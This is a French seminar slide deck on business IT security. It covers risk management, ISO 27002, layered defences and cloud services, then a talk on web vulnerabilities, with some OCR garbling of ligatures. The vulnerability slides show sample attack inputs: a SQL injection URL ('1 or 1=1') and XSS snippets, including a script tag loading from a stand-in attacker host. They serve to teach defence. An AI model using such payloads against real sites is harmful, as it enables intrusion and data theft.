Embed Size (px)
DESCRIPTION
La sécurité informatique recouvre un vaste domaine. Que ce soit au niveau du datacenter, en transit, sur vos postes de travail, via vos appareils mobiles ou encore en mode cloud, vos données doivent être protégées en continu. Mais il n'est pas toujours évident de gérer et de choisir les bons outils pour y parvenir. Quelques règles élémentaires de bonnes pratiques peuvent pourtant garantir à votre entreprise sa stabilité informatique.
Citation preview
Parole d’expert
Philippe MONFILS - ComputerLand SLM
Bruno MAIRLOT - Maehdros
Une organisation conjointe avec Café Numérique
La sécurité IT - Une précaution vitale pour votre entreprise
Avec le soutien de :
� Début des années 2000, la cybercriminalité n’a pas cessé de se développer
� Le marché de la sécurité informatique est devenu l’un des secteurs les plus dynamiques de l’industrie IT
� les entreprises ont multiplié par trois la somme consacrée à la sécurité informatique en l’espace de six ans › Une société emploie désormais plus de 7 % de son
budget informatique dans la sécurité contre seulement 2 % en 2002.
› À l’heure actuelle, 55 % des entreprises ont une politique de sécurité documentée, contre 27 % en 2002
� Sur base d’une étude de Symantec, 70 % des entreprises en France ont été victimes d’une attaque informatique au cours des douze derniers mois
� 21 % des entreprises assurent constater une augmentation de la fréquence d’attaque, contre 29 % en 2010
� Cependant 92 % des entreprises estiment avoir subi des pertes à la suite à des attaques contre
100 % en 2009
� Une entreprise sécurisée préserve sa réputation
� Une sécurité garantie peut devenir un argument de vente
� Une sécurité inadaptée annule les avantages de la technologie
� Difficiles à quantifier !
� La sécurité des systèmes d’information ou SSI › l’ensemble des moyens techniques, organisationnels, juridiques et humains
nécessaires et mis en place pour conserver, rétablir, et garantir la sécurité du système d'information »
› Mise en place d’une politique de sécurité des systèmes d’information PSSI
� ISO/CEI 27002 › L’ISO/CEI 27002 (anciennement ISO 17799) décrit les règles de bonnes pratiques
� Risk assessment › L’évaluation du risque ou « risk assessment » doit être réalisée pour déterminer les
actions afin de réduire et de maintenir le risque à un niveau acceptable › Le risque n’est pas nécessairement lié à l’informatique. L’aspect social ou humain
est critique. › La gestion du risque consiste idéalement à :
� Choisir la méthode d’évaluation du risque adaptée à l’entreprise � Définir les critères d’identification des risques
› Les méthodologies les plus connues : MEHARI & OCTAVE
� La confidentialité : garantit que l’information est seulement accessible à ceux qui ont l’autorisation d’y accéder
� L’intégrité : représente la garantie que les données n’ont pas été modifiées, qu’elles sont complètes et précises
� La disponibilité : désigne la garantie du bon fonctionnement du système d'information
� L’authentification : S’assure que seules les personnes ayant le droit d’accéder aux informations puissent disposer des informations
� La non-répudiation : Elle permet de garantir qu'une transaction ne peut être niée ou contestée
� La couche physique › La gestion du courant, du refroidissement, des contrôles d’accès › Vidéosurveillance › Procédures en cas d’incendie ou d’inondation › La mise en place d’une solution de rechange en cas de perte totale
� La couche réseau › Configuration des routeurs, switches, Access Points WiFi, … › Détection et prévention des intrusions (IDS / IPS) › Firewall › Accès distants - VPN › Téléphonie IP › Service DNS › 802.1X, NAC / NAP
� La couche virtualisation › Règles de sécurité lors de la conception des machines virtuelles › Application d’un antimalware au niveau de la couche de virtualisation
� La couche OS et applications › Mise à jour des updates de l’OS › Mise à jour des applications › Antivirus › Firewall › HIDS › Antispam › Filtrage WEB
� La couche données › Les grands principes d’un DRP › De la mise en place d’un DRP › De citer les grandes techniques utilisées
� La couche utilisateurs › Politique de gestions des mots de passe › Authentification forte › Signature des documents › Signature et encryption des emails › Chiffrement des disques durs et lecteurs externes › Protection pour appareils mobiles › Charte des règles de bonne conduite
� La couche audit et management › Check-list d’évaluation › Test de pénétration en externe › Test de pénétration en interne › Surveillance de l’Active Directory › Inventaire du parc informatique › Collecte d’information (inventaire)
� Le Cloud Computing consiste à déporter des services, des stockages ou des traitements informatiques traditionnellement localisés sur des serveurs locaux sur des serveurs distants
� Avantages : › Haute disponibilité › Sécurité › Accessibilité › Évolutivité › Simplicité › Modèle locatif › Réduction et maitrise des coûts
� Catégorie 1 : Services Backup & DRP � Catégorie 2 : Web hosting � Catégorie 3 : Messagerie � Catégorie 4 : Infrastructure
Network – Firewall Network – Wireless
Applications – Antivirus Applications – Firewall
Applications –Antispyware
Applications - Anti spam OS – Mises à jour
Applications – Mise à jour
SILVER
Audit Audit de code + Audit de vulnérabilité + Audit de configuration
Evaluation des risques
GOLD
PLATINUM
Sécurité switches Sécurité routeurs Gestion 802.1X Gestion VPN
IWS – Web Filtrering Plan DRP
Encryption email Signature email Signature PDF
Mobile Security
Gestion salle serveur IDS / IPS
Sécurité switches Sécurité routeurs
Téléphonie Secure DNS
Deep Security Authentification forte
Chiffrement des disques Mobile Security
Règles virtualisation Authentification forte
Gestion 802.1X Infrastructure NAC / NAP
IWS – Web Filtering Intrusion Defense Firewall
DLP -> Data Loss Prevention Plan DRP
Signature PDF Gestion des mots de passe
Simple
Evaluation des risques Avancée
MAEHDROS Internet Services
Bruno Mairlot Gérant et fondateur de MAEHDROS Spécialiste en hos<ng et connec<vité
Sécurité des données et des systèmes hébergés
Twi6er: @bmairlot LinkedIn: brunomairlot
Défini@ons
• Un système est sécurisé lorsqu’il se comporte comme a@endu, à savoir : – Lorsqu’il est disponible – Lorsqu’il est intègre – Lorsque sa confiden@alité est garan@e
Objec@fs
• Les a6aquants peuvent être de plusieurs natures et u@liser différentes méthodes. Les buts recherchés peuvent être de deux types : – Financier – Notoriété et/ou idéalisme
Objec@fs financiers
• Le vol d’informa@on sensible (comptabilité, liste de client, brevets, codes informa@ques,…)
• Le vol d’informa@on directement financière comme les numéro de carte de crédit
Objec@fs notoriété / idées
• Volonté de nuire à un concurrent ou une société honnie (cf l’a6aque du Sony Playsta@on Network, près de 100 millions d’u@lisateur)
• A6aque des sites gouvernementaux (cf l’a6aque par Anonymous du site de la police espagnole)
• Volonté de montrer son savoir-‐faire
L’externalisa@on est-‐elle une solu@on ?
• En soi, l’externalisa@on n’est pas la solu@on, mais elle fait par@e des éléments à me6re en place pour une bonne défense car elle permet de : – restreindre le périmètre d’ac@on – Augmenter le rapport contraintes sur la sécurité/confort (par coercicion)
– Déléguer la tâche de protec@on des données sensibles
Les désavantages de l’externalisa@on
• En général, sur un réseau hébergé, la bande passante accessible aux infrastructures est sensiblement supérieure (parfois jusqu’à un facteur 1000) et permet donc d’a6aquer beaucoup plus rapidement.
• Cela peut toutefois être un avantage face à un a6aquant isolé
• Il y a des risques de dommages collatéraux (p. ex. une a6aque sur le cloud d’Amazon a6eindrait tous ses clients)
Cer@ficat SSL
• Les cer@ficats SSL sont conçus pour deux objec@fs : authen<fier le site que vous visitez et protéger vos données (notamment les données d’accès)
• Accessoirement un cer@ficat peut être u@lisé pour authen@fier le client
• Il est important de vérifier l’URL et l’éme6eur du cer@ficat.
Cer@ficat SSL
IPv6
• Dans le monde IPv6, tous les appareils seront connectés directement à Internet, sans passer par un Nat et parfois sans firewall (mobile)
• Il seront d’autant plus vulnérables s’ils ne sont pas à jour et protégés correctement
Vulnérabilités des sites web • Injec@on • Cross-‐Site Scrip@ng • Authen@fica@on et Session • Insecure Object Reference • Cross-‐Site Forged Request • Configura@on de la sécurité incorrecte • Stockage non sécurisé (credit card number,…) • Restric@on d’URL mal implémentée • Cryptographie mal u@lisée ou incomprise
Parades
• Mises à jour des applica@ons et des systèmes, protec@on contre la rétro-‐ingénierie
• Détec@on et préven@on d’intrusion • Educa@on et sensibilisa@on des u@lisateurs • Authen@fica@on et Autorisa@on • Protec@on par cryptographie (symétrique et/ou assymétrique)
Exemples : Injec@on
• Injec@on de code exécutable via les zones d’upload (via HTTP ou FTP) et ré-‐exécu@on de ces codes.
• Protec@on : U@liser des zones non couvertes par des URLs et accéder à ces URLs uniquement via des scripts sécurisés. – h6p://.../uploads/profil1000.jpg : Wrong – h6p://.../getUpload/?profilID=1000.jpg : Be6er
Exemples : Injec@on • URL basique :
– h6p://mon.site/viewProfil/?id=1 • L’a6aquant remplace ‘1’ => ‘1 or 1=1’ • URL forgée :
– h6p://mon.site/viewProfil/?id=1 or 1=1 • La query SQL est alors valide pour toutes les lignes de la
table. Il est alors possible d’accéder à n’importe quel profil • N’importe quel code SQL peut alors être injecté derrière ce
‘1=1’ • Protec@on : Valider et Vérifier les URLs et les paramètres
de manière systéma<que
Exemples : XSS
• Généralement les injec@ons amènent à produire des scripts Javascript pour effectuer toute une série de commande via d’autres sites.
• <script src=‘h6p://hackersite.ru/[email protected]’></script>
• <body onload=‘alert() ’> • <img onerror=‘…’>
Recommanda@ons globales • Installa@on d’une passerelle filtrante en amont des serveurs
• Détec@on d’un (trop) grand nombre de requêtes/session TCP d’un même host
• Verrouillage read-‐only des codes • U@lisa@on de méthodes sécurisées pour le déploiement des nouveaux codes et nouvelles version
• Eviter les hébergements mutualisés (car manque de contrôle)
Merci pour votre a6en@on.
